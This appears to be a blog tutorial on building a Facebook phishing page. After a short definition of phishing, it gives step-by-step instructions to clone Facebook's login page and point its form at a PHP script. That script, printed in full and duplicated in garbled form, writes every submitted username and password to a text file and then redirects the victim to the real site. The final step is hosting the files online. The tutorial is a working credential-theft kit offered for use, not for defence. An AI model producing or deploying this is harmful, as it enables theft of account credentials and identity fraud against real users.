facebook Phishing
Phishing is the act of fooling a computer user into submitting personal information by creating fake websites that looks like a real (and trusted) sites it is a hacker technique of fishing for password and other secret financial information
Phishing is a type of online identity theft. It uses email and fake website that are designed to steal your personal data or information such as password, account data, or other information
the facebook phishing page example is given below
Look this is the real facebook page URL but after creating phishing page of the website the website look like same but the URL will change which is redirect the
today we create a facebook phishing page which look similar to a facebook page but it’s not actually a facebook page when victim enter his username and password the phishing page will redirect to the other url
after creating phishing you can see the facebook page look like real facebook page but the url is changed you can see localhost/facebook
steps to create phishing page
step 1:-Go to the Facebook page and then right click on the page, u will see the option view source page,click on that.
step 2:- now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad
step 3:- Now open the notepad and press CTRL+F,and type “ACTION”
step 4:-You will have to find a text which looks like ..
action=“https://www.facebook.com/login.php?login_attempt=1“
step 5:-delete all the text written in red colour and instead of it write post.php
step 6:-Now save it on your desktop with the name index.htm,not index.html,remember
step 7:-Now your phishing page is ready
step 8:-Open a new notepad and save the given data with the name post.php
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
step 9:-you have two files now one is index.htm and another is post.php,remember file extension is important
step 10:Now u have to upload it in a web hosting site
Comments
Post a Comment